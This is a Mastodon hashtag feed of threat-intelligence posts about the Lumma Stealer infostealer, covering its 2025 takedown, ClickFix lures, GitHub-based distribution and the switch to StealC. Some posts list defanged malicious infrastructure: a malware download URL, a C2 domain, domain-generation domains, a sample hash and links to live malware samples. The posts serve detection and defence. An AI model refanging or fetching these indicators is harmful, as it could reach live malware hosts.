mstdn.social is one of the many independent Mastodon servers you can use to participate in the fediverse.
A general-purpose Mastodon server with a 500 character limit. All languages are welcome.

Administered by:

Server stats:

0
active users

#lummastealer

2 posts2 participants2 posts today
ESET Research<p>In May 2025, <a href="https://infosec.exchange/tags/ESET" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ESET</span></a> participated in operations that largely disrupted the infrastructure of two notorious infostealers: <a href="https://infosec.exchange/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a> and <a href="https://infosec.exchange/tags/Danabot" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Danabot</span></a>. <br>As part of the Lumma Stealer disruption effort, carried out in conjunction with Microsoft, BitSight, Lumen, Cloudflare, CleanDNS, and GMO Registry, ESET supplied technical analysis and statistical information. <br>Danabot was targeted by the <a href="https://infosec.exchange/tags/FBI" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>FBI</span></a> and <a href="https://infosec.exchange/tags/DCIS" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>DCIS</span></a>, alongside <a href="https://infosec.exchange/tags/OperationEndgame" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>OperationEndgame</span></a> led by <a href="https://infosec.exchange/tags/Europol" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Europol</span></a> and <a href="https://infosec.exchange/tags/Eurojust" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Eurojust</span></a>. ESET participated together with several other companies. We provided the analysis of the malware’s backend infrastructure and identified its C&amp;C servers. <br>Before these takedowns, both infostealers were on the rise: in H1 2025, Lumma Stealer detections grew by 21%, while Danabot’s numbers increased by more than 50%.<br> For a time, Lumma Stealer was the primary payload of HTML/FakeCaptcha trojan, used in the <a href="https://infosec.exchange/tags/ClickFix" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ClickFix</span></a> social engineering attacks that we also cover in this issue of the <a href="https://infosec.exchange/tags/ESETThreatReport" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ESETThreatReport</span></a>. In recent months, we have seen Danabot being delivered via ClickFix as well. <br>For more details on these two operations and on the ClickFix attacks, read the latest <a href="https://infosec.exchange/tags/ESETThreatReport" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ESETThreatReport</span></a>: <a href="https://welivesecurity.com/en/eset-research/eset-threat-report-h1-2025" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">welivesecurity.com/en/eset-res</span><span class="invisible">earch/eset-threat-report-h1-2025</span></a></p>
OTX Bot<p>Fix the Click: Preventing the ClickFix Attack Vector</p><p>This article discusses the rising threat of ClickFix, a social engineering technique used by threat actors to trick victims into executing malicious commands under the guise of quick fixes for computer issues. The technique has been observed in campaigns distributing various malware, including NetSupport RAT, Latrodectus, and Lumma Stealer. ClickFix lures often use clipboard hijacking and can bypass standard detection controls. The article provides case studies of recent campaigns, hunting tips for detecting ClickFix infections, and recommendations for proactive defense measures. It emphasizes the importance of user education and implementing robust security controls to mitigate this evolving threat.</p><p>Pulse ID: 686ffe0f30bfbdfa037e4168<br>Pulse Link: <a href="https://otx.alienvault.com/pulse/686ffe0f30bfbdfa037e4168" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">otx.alienvault.com/pulse/686ff</span><span class="invisible">e0f30bfbdfa037e4168</span></a> <br>Pulse Author: AlienVault<br>Created: 2025-07-10 17:53:19</p><p>Be advised, this data is unverified and should be considered preliminary. Always do further verification.</p><p><a href="https://social.raytec.co/tags/Clipboard" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Clipboard</span></a> <a href="https://social.raytec.co/tags/CyberSecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>CyberSecurity</span></a> <a href="https://social.raytec.co/tags/Education" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Education</span></a> <a href="https://social.raytec.co/tags/InfoSec" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>InfoSec</span></a> <a href="https://social.raytec.co/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a> <a href="https://social.raytec.co/tags/Malware" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Malware</span></a> <a href="https://social.raytec.co/tags/NetSupport" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>NetSupport</span></a> <a href="https://social.raytec.co/tags/NetSupportRAT" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>NetSupportRAT</span></a> <a href="https://social.raytec.co/tags/OTX" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>OTX</span></a> <a href="https://social.raytec.co/tags/OpenThreatExchange" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>OpenThreatExchange</span></a> <a href="https://social.raytec.co/tags/RAT" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>RAT</span></a> <a href="https://social.raytec.co/tags/SocialEngineering" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SocialEngineering</span></a> <a href="https://social.raytec.co/tags/bot" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>bot</span></a> <a href="https://social.raytec.co/tags/AlienVault" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>AlienVault</span></a></p>
Pyrzout :vm:<p>Hackers weaponize Shellter red teaming tool to spread infostealers – Source: securityaffairs.com <a href="https://ciso2ciso.com/hackers-weaponize-shellter-red-teaming-tool-to-spread-infostealers-source-securityaffairs-com/" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">ciso2ciso.com/hackers-weaponiz</span><span class="invisible">e-shellter-red-teaming-tool-to-spread-infostealers-source-securityaffairs-com/</span></a> <a href="https://social.skynetcloud.site/tags/rssfeedpostgeneratorecho" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>rssfeedpostgeneratorecho</span></a> <a href="https://social.skynetcloud.site/tags/informationsecuritynews" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>informationsecuritynews</span></a> <a href="https://social.skynetcloud.site/tags/ITInformationSecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ITInformationSecurity</span></a> <a href="https://social.skynetcloud.site/tags/SecurityAffairscom" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SecurityAffairscom</span></a> <a href="https://social.skynetcloud.site/tags/CyberSecurityNews" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>CyberSecurityNews</span></a> <a href="https://social.skynetcloud.site/tags/PierluigiPaganini" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>PierluigiPaganini</span></a> <a href="https://social.skynetcloud.site/tags/SecurityAffairs" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SecurityAffairs</span></a> <a href="https://social.skynetcloud.site/tags/SecurityAffairs" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SecurityAffairs</span></a> <a href="https://social.skynetcloud.site/tags/BreakingNews" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>BreakingNews</span></a> <a href="https://social.skynetcloud.site/tags/lummastealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>lummastealer</span></a> <a href="https://social.skynetcloud.site/tags/hackingnews" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>hackingnews</span></a> <a href="https://social.skynetcloud.site/tags/Cybercrime" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Cybercrime</span></a> <a href="https://social.skynetcloud.site/tags/Security" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Security</span></a> <a href="https://social.skynetcloud.site/tags/SHELLTER" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SHELLTER</span></a> <a href="https://social.skynetcloud.site/tags/hacking" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>hacking</span></a> <a href="https://social.skynetcloud.site/tags/Malware" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Malware</span></a></p>
Brad<p>2025-07-02 (Wednesday): Another <a href="https://infosec.exchange/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a> infection with follow-up <a href="https://infosec.exchange/tags/Rsockstun" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Rsockstun</span></a> <a href="https://infosec.exchange/tags/malware" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>malware</span></a>. </p><p>The <a href="https://infosec.exchange/tags/Lumma" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Lumma</span></a> Stealer infection uses a password-protected 7-zip archive, a NullSoft installer, and <a href="https://infosec.exchange/tags/AutoItv3" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>AutoItv3</span></a>. </p><p>Malware samples, a <a href="https://infosec.exchange/tags/pcap" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>pcap</span></a> and some IOCs are available at <a href="https://www.malware-traffic-analysis.net/2025/07/02/index.html" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">malware-traffic-analysis.net/2</span><span class="invisible">025/07/02/index.html</span></a></p>
Brad<p>2025-06-27 (Friday): I ran another <a href="https://infosec.exchange/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a> infection today. It was basically the same as yesterday, except for the follow-up malware.</p><p>I saw the same URL for hxxp[:]//86.54.25[.]40/sok.exe, but it returned a different file.</p><p>It generated the same type of C2 traffic over TCP port 16443, but it used a different domain for the C2 server at eset-blacklist[.]net. </p><p>Sample:</p><p>- <a href="https://bazaar.abuse.ch/sample/9dc1872510d70d954662b42c0e3bedb80e719272554efc0051cb727241a6cacb/" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">bazaar.abuse.ch/sample/9dc1872</span><span class="invisible">510d70d954662b42c0e3bedb80e719272554efc0051cb727241a6cacb/</span></a></p><p>Sandbox analysis:</p><p>- <a href="https://www.joesandbox.com/analysis/1724473" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="">joesandbox.com/analysis/1724473</span><span class="invisible"></span></a></p><p>- <a href="https://tria.ge/250627-26apgask14" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="">tria.ge/250627-26apgask14</span><span class="invisible"></span></a></p><p>- <a href="https://app.any.run/tasks/651d4998-807d-4ac2-821b-88061c288013" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">app.any.run/tasks/651d4998-807</span><span class="invisible">d-4ac2-821b-88061c288013</span></a></p>
Brad<p>2025-06-26 (Thursday): <a href="https://infosec.exchange/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a> infection leads to follow-up loader that retrieves a pen test tool hosted on Github and configures it as <a href="https://infosec.exchange/tags/malware" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>malware</span></a>. </p><p>A <a href="https://infosec.exchange/tags/pcap" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>pcap</span></a> of the infection traffic, the associated malware, and IOCs are available at: <a href="https://www.malware-traffic-analysis.net/2025/06/26/index.html" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">malware-traffic-analysis.net/2</span><span class="invisible">025/06/26/index.html</span></a></p><p><a href="https://infosec.exchange/tags/Lumma" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Lumma</span></a></p>
The Threat Codex<p>Lumma meets LolzTeam<br><a href="https://infosec.exchange/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a> <br><a href="https://intelinsights.substack.com/p/lumma-meets-lolzteam" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">intelinsights.substack.com/p/l</span><span class="invisible">umma-meets-lolzteam</span></a></p>
Mateusz Chrobok<p>Zazwyczaj donoszę Wam (oczywiście uprzejmie) o wyciekach, kradzieżach, szpiegostwie i innych bezpiecznikowych katastrofach. Ale dziś? Mamy dwie gigantyczne wygrane w wojnie z cyberprzestępcami - i to z polskim akcentem! 🦫 </p><p>W nowym odcinku opowiadam o spektakularnym rozbiciu LummaStealera i ciosie wymierzonym w Danabota - dwóch złośliwych bestiach, które przez lata truły życie firmom i zwykłym użytkownikom na całym świecie. Jak działały? Jak je rozpracowano? Jakie miało to konsekwencje?</p><p>I co najważniejsze - jak w ogóle wygląda "fraud-as-a-service" od kuchni, łącznie z cenami, dokumentacją i obsługą klienta 24/7?</p><p>Odcinek przygotowany przy współpracy z ESET i DAGMA Bezpieczeństwo IT🦾 </p><p>Zapraszam 👇<br><a href="https://youtu.be/fcTdhBq4U88" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="">youtu.be/fcTdhBq4U88</span><span class="invisible"></span></a> </p><p><a href="https://infosec.exchange/tags/cybersecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>cybersecurity</span></a> <a href="https://infosec.exchange/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a> <a href="https://infosec.exchange/tags/Danabot" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Danabot</span></a> <a href="https://infosec.exchange/tags/ESET" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ESET</span></a> <a href="https://infosec.exchange/tags/DagmaBezpiecze%C5%84stwoIT" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>DagmaBezpieczeństwoIT</span></a></p>
OTX Bot<p>GitHub's Dark Side: Unveiling Malware Disguised as Cracks, Hacks, and Crypto Tools</p><p>Cybercriminals are exploiting GitHub's reputation to distribute malware, particularly targeting gamers and children. They create repositories offering game hacks, cracked software, and crypto tools, which actually contain Lumma Stealer variants. The attack chain begins with users searching for these products online, leading them to malicious GitHub repositories or YouTube videos. These repositories use social engineering tactics, including detailed descriptions, fake licenses, and instructions to disable antivirus software. The malware collects sensitive information from infected systems and transfers it to command-and-control servers. McAfee provides detection and mitigation strategies, emphasizing the importance of user education, regular software updates, and avoiding unofficial downloads.</p><p>Pulse ID: 6852b2411a397b8565ae8343<br>Pulse Link: <a href="https://otx.alienvault.com/pulse/6852b2411a397b8565ae8343" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">otx.alienvault.com/pulse/6852b</span><span class="invisible">2411a397b8565ae8343</span></a> <br>Pulse Author: AlienVault<br>Created: 2025-06-18 12:34:09</p><p>Be advised, this data is unverified and should be considered preliminary. Always do further verification.</p><p><a href="https://social.raytec.co/tags/CyberSecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>CyberSecurity</span></a> <a href="https://social.raytec.co/tags/Education" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Education</span></a> <a href="https://social.raytec.co/tags/GitHub" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>GitHub</span></a> <a href="https://social.raytec.co/tags/ICS" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ICS</span></a> <a href="https://social.raytec.co/tags/InfoSec" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>InfoSec</span></a> <a href="https://social.raytec.co/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a> <a href="https://social.raytec.co/tags/Malware" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Malware</span></a> <a href="https://social.raytec.co/tags/McAfee" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>McAfee</span></a> <a href="https://social.raytec.co/tags/OTX" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>OTX</span></a> <a href="https://social.raytec.co/tags/OpenThreatExchange" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>OpenThreatExchange</span></a> <a href="https://social.raytec.co/tags/RAT" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>RAT</span></a> <a href="https://social.raytec.co/tags/SocialEngineering" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SocialEngineering</span></a> <a href="https://social.raytec.co/tags/YouTube" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>YouTube</span></a> <a href="https://social.raytec.co/tags/bot" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>bot</span></a> <a href="https://social.raytec.co/tags/AlienVault" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>AlienVault</span></a></p>
The Threat Codex<p>Group-IB contributes to INTERPOL’s Operation Secure, leading to the arrest of 32 suspects linked to information stealer malware in Asia<br><a href="https://infosec.exchange/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a> <a href="https://infosec.exchange/tags/RisePro" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>RisePro</span></a> <a href="https://infosec.exchange/tags/MetaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>MetaStealer</span></a> <br><a href="https://www.group-ib.com/media-center/press-releases/interpol-infostealer-bust/" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">group-ib.com/media-center/pres</span><span class="invisible">s-releases/interpol-infostealer-bust/</span></a></p>
Pyrzout :vm:<p>The strange tale of ischhfd83: When cybercriminals eat their own – Source: news.sophos.com <a href="https://ciso2ciso.com/the-strange-tale-of-ischhfd83-when-cybercriminals-eat-their-own-source-news-sophos-com/" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">ciso2ciso.com/the-strange-tale</span><span class="invisible">-of-ischhfd83-when-cybercriminals-eat-their-own-source-news-sophos-com/</span></a> <a href="https://social.skynetcloud.site/tags/rssfeedpostgeneratorecho" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>rssfeedpostgeneratorecho</span></a> <a href="https://social.skynetcloud.site/tags/CyberSecurityNews" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>CyberSecurityNews</span></a> <a href="https://social.skynetcloud.site/tags/cybercrimeforums" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>cybercrimeforums</span></a> <a href="https://social.skynetcloud.site/tags/ThreatResearch" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ThreatResearch</span></a> <a href="https://social.skynetcloud.site/tags/nakedsecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>nakedsecurity</span></a> <a href="https://social.skynetcloud.site/tags/nakedsecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>nakedsecurity</span></a> <a href="https://social.skynetcloud.site/tags/lummastealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>lummastealer</span></a> <a href="https://social.skynetcloud.site/tags/SophosXOps" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SophosXOps</span></a> <a href="https://social.skynetcloud.site/tags/AsyncRAT" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>AsyncRAT</span></a> <a href="https://social.skynetcloud.site/tags/backdoor" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>backdoor</span></a> <a href="https://social.skynetcloud.site/tags/FEATURED" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>FEATURED</span></a> <a href="https://social.skynetcloud.site/tags/asyncrat" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>asyncrat</span></a> <a href="https://social.skynetcloud.site/tags/Backdoor" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Backdoor</span></a> <a href="https://social.skynetcloud.site/tags/featured" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>featured</span></a></p>
Infoblox Threat Intel<p>Last week, Microsoft reported that their Digital Crimes Unit (DCU) and international partners disrupted Lumma Stealer by taking down 2,300 domains critical to the malware's operation. Shortly after, Palo Alto's Unit 42 reported about cyber campaigns that previously dropped Lumma Stealer are now distributing StealC infostealer payloads. We analyzed the DNS infrastructure related to the attacks and discovered a large number of malicious registered domain generation algorithm (RDGA) domains. Based on passive DNS, the threat actor that controls the infrastructure configured the domains to a staging environment via a dedicated Panama IP address (self-signed SSL) before deploying them. We identified 144 unique domains in this IP space, and all of them were detected as "suspicious" by our algorithms 1-2 months before they were activated for malicious activity.<br> <br>Disrupting criminal operations is difficult and they will find ways to resurface. However, this example proves that blocking connections at the DNS level can often protect users against the new versions before they emerge. The infostealer actors made a quick turn, but we were already blocking their path. Our specialty is in DNS analytics, so we use DNS signatures, as opposed to malware signatures, for preemptive security. We love this stuff.<br> <br>Here are some examples of the RDGA domains:<br>2323dot2[.]cfd, 2323dot2[.]cyou, 2323dot2[.]my, 232pip1[.]my, 232pip1[.]sbs, 832pip[.]cfd, 832pip[.]cyou, 832pip[.]my, 832pip[.]sbs, b3cloud[.]cfd, b3cloud[.]cyou, b3cloud[.]my, b3cloud[.]sbs, bin48[.]cfd, bin48[.]cyou, bin48[.]my, bin898293[.]cfd, bin898293[.]cyou, bin898293[.]my, bin898293[.]sbs, bit7dl[.]cfd, bit7dl[.]cyou, bit7dl[.]my, bit7dl[.]sbs, bot113cloud[.]cfd, bot113cloud[.]cyou, bot113cloud[.]my<br> <br>These campaigns share similar TTPs with those that we reported several months ago. The threat actor that we discussed in this post (<a href="https://infosec.exchange/@InfobloxThreatIntel/114027715851469775" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">infosec.exchange/@InfobloxThre</span><span class="invisible">atIntel/114027715851469775</span></a>) also distributed Lumma Stealer and used RDGA domains, but incorporated additional components, such as traffic distribution systems (TDS), web trackers, and cloakers.<br> <br> <br><a href="https://infosec.exchange/tags/dns" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>dns</span></a> <a href="https://infosec.exchange/tags/threatintel" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>threatintel</span></a> <a href="https://infosec.exchange/tags/threatintelligence" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>threatintelligence</span></a> <a href="https://infosec.exchange/tags/cybercrime" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>cybercrime</span></a> <a href="https://infosec.exchange/tags/cybersecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>cybersecurity</span></a> <a href="https://infosec.exchange/tags/infosec" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>infosec</span></a> <a href="https://infosec.exchange/tags/infoblox" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>infoblox</span></a> <a href="https://infosec.exchange/tags/infobloxthreatintel" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>infobloxthreatintel</span></a> <a href="https://infosec.exchange/tags/infostealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>infostealer</span></a> <a href="https://infosec.exchange/tags/lummastealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>lummastealer</span></a> <a href="https://infosec.exchange/tags/stealc" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>stealc</span></a> <a href="https://infosec.exchange/tags/tds" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>tds</span></a> <a href="https://infosec.exchange/tags/tracker" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>tracker</span></a> <a href="https://infosec.exchange/tags/cloaker" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>cloaker</span></a> <a href="https://infosec.exchange/tags/rdga" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>rdga</span></a></p>
ENTER.CO<p><a href="https://mastodon.social/tags/PorSiTeLoPerdiste" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>PorSiTeLoPerdiste</span></a> Microsoft descubre un malware que infectó 394.000 equipos en todo el planeta, Colombia entre los países afectados <a href="https://www.enter.co/empresas/seguridad/microsoft-descubre-un-malware-que-infecto-394-000-equipos-en-todo-el-planeta-colombia-entre-los-paises-afectados/?utm_source=dlvr.it&amp;utm_medium=mastodon" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">enter.co/empresas/seguridad/mi</span><span class="invisible">crosoft-descubre-un-malware-que-infecto-394-000-equipos-en-todo-el-planeta-colombia-entre-los-paises-afectados/?utm_source=dlvr.it&amp;utm_medium=mastodon</span></a> <a href="https://mastodon.social/tags/Seguridad" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Seguridad</span></a> <a href="https://mastodon.social/tags/Lumma" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Lumma</span></a> <a href="https://mastodon.social/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a></p>
Softsasi<p>🚨 Lumma Stealer malware infected 394,000 Windows PCs, potentially stealing passwords! 😱</p><p>🛡️ Protect yourself: Use strong passwords, enable 2FA, and avoid suspicious links.</p><p>🔐 Softsasi offers cybersecurity audits &amp; password management solutions. Stay safe online!<br><a href="https://mastodon.social/tags/cybersecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>cybersecurity</span></a> <a href="https://mastodon.social/tags/malware" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>malware</span></a> <a href="https://mastodon.social/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a> <a href="https://mastodon.social/tags/Softsasi" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Softsasi</span></a></p>
Pyrzout :vm:<p>Response to CISA Advisory (AA25-141B): Threat Actors Deploy LummaC2 Malware to Exfiltrate Sensitive Data from Organizations – Source: securityboulevard.com <a href="https://ciso2ciso.com/response-to-cisa-advisory-aa25-141b-threat-actors-deploy-lummac2-malware-to-exfiltrate-sensitive-data-from-organizations-source-securityboulevard-com/" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">ciso2ciso.com/response-to-cisa</span><span class="invisible">-advisory-aa25-141b-threat-actors-deploy-lummac2-malware-to-exfiltrate-sensitive-data-from-organizations-source-securityboulevard-com/</span></a> <a href="https://social.skynetcloud.site/tags/rssfeedpostgeneratorecho" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>rssfeedpostgeneratorecho</span></a> <a href="https://social.skynetcloud.site/tags/SecurityBloggersNetwork" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SecurityBloggersNetwork</span></a> <a href="https://social.skynetcloud.site/tags/adversaryemulation" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>adversaryemulation</span></a> <a href="https://social.skynetcloud.site/tags/Broad" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Broad</span></a>-BasedAttacks <a href="https://social.skynetcloud.site/tags/CyberSecurityNews" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>CyberSecurityNews</span></a> <a href="https://social.skynetcloud.site/tags/SecurityBoulevard" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SecurityBoulevard</span></a> <a href="https://social.skynetcloud.site/tags/CISAAdvisory" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>CISAAdvisory</span></a> <a href="https://social.skynetcloud.site/tags/lummastealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>lummastealer</span></a> <a href="https://social.skynetcloud.site/tags/LummaC2" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaC2</span></a> <a href="https://social.skynetcloud.site/tags/CISA" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>CISA</span></a></p>
Brad<p>2025-05-22 (Thursday): After the recent <a href="https://infosec.exchange/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a> disruption, I found an active sample today, so how effective was the disruption, really? </p><p>SHA256 hash for the installer EXE for Lumma Stealer: </p><p>8619bea9571a4dcc4b7f4ba494d444b8078d06dea385dc0caa2378e215636a65</p><p>Analysis: </p><p>- <a href="https://tria.ge/250523-afpxxsfm5t" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="">tria.ge/250523-afpxxsfm5t</span><span class="invisible"></span></a><br>- <a href="https://app.any.run/tasks/add82eaa-bdb8-43b9-885b-c0a58cc2530c" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">app.any.run/tasks/add82eaa-bdb</span><span class="invisible">8-43b9-885b-c0a58cc2530c</span></a></p><p>To be fair, I investigated a campaign that was pushing Lumma Stealer earlier this week, and it had switched to <a href="https://infosec.exchange/tags/StealC" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>StealC</span></a> v2 malware earlier today (2025-05-22):</p><p>- <a href="https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-05-22-campaign-switches-from-Lumma-to-StealC-v2.txt" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">github.com/PaloAltoNetworks/Un</span><span class="invisible">it42-timely-threat-intel/blob/main/2025-05-22-campaign-switches-from-Lumma-to-StealC-v2.txt</span></a></p><p>So the disruption was at least somewhat effective based on what I'm seeing. I don't have eyes on the criminal underground, though, so I don't know what's happening with Lumma Stealer's customers.</p>
